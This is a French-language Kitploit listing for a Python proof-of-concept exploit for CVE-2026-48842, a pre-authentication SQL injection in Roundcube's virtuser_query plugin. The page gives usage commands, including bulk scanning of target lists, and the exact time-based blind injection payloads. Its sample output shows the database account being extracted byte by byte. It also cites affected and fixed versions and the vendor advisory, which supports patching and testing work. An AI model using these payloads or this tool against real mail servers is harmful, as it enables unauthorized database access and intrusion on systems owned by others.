Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48842 — PoC Python pour CVE-2026-48842, une injection SQL pré-authentification dans le plugin virtuser_query de Roundcube. Confirme la faille via un différentiel temporel et lit à l'aveugle le compte de la base de données. | Kitploit
Outils/GitHubGitHub/4minx/cve-2026-48842
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionSécurité des Bases de Données
GitHub4minx/cve-2026-48842

CVE-2026-48842

PoC Python pour CVE-2026-48842, une injection SQL pré-authentification dans le plugin virtuser_query de Roundcube. Confirme la faille via un différentiel temporel et lit à l'aveugle le compte de la base de données.

Voir le dépôt
il y a 6h 50mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-48842 PoC — SQLi pre-auth dans virtuser_query de Roundcube

PoC pour CVE-2026-48842, une injection SQL pre-auth dans le plugin optionnel virtuser_query de Roundcube Webmail.

L'outil fait deux choses et refuse de deviner quoi que ce soit à leur sujet :

  1. Confirme l'injection par un différentiel vrai/faux (pas un simple sleep).
  2. Prouve l'impact en lisant le compte de base de données de la cible avec --dumpdbuser.

Il affiche le SQL exact que chaque sonde produit, afin qu'un résultat échoué ou non concluant ne soit jamais présenté comme une découverte.


Informations sur la vulnérabilité

CVECVE-2026-48842
TypeCWE-89 — injection SQL
Composantplugins/virtuser_query/virtuser_query.php (non activé par défaut)
AffectéRoundcube 1.6.x < 1.6.16, 1.7.x < 1.7.1
Corrigé1.6.16, 1.7.1

Prérequis

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

Utilisation

Cible unique, détection seule

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

Cible unique, prouver l'impact en lisant le compte de la base de données

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

Oracle plus rapide (un hôte chargé peut nécessiter un ajustement)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

Nombreuses cibles

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

Options

ArgumentDescriptionDéfaut
targetURL de base de Roundcube, par ex. https://mail.example.tld ou http://host/roundcube—
-l, --list FILEFichier avec une URL de cible par ligne. # démarre un commentaire.—
-d, --delay NSecondes de SLEEP par sonde oracle7
--dumpdbuserLecture aveugle de CURRENT_USER() une fois l'injection confirméedésactivé
-h, --helpAfficher l'aide—

Exemple de sortie

Exécution réelle contre un Roundcube 1.6.15 local :

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ Soutien

Si ce projet vous a aidé, envisagez de soutenir son développement :

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

Références

  • Avis de sécurité Roundcube 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • Commit de correction (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • Commit de correction (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
Télécharger l’outil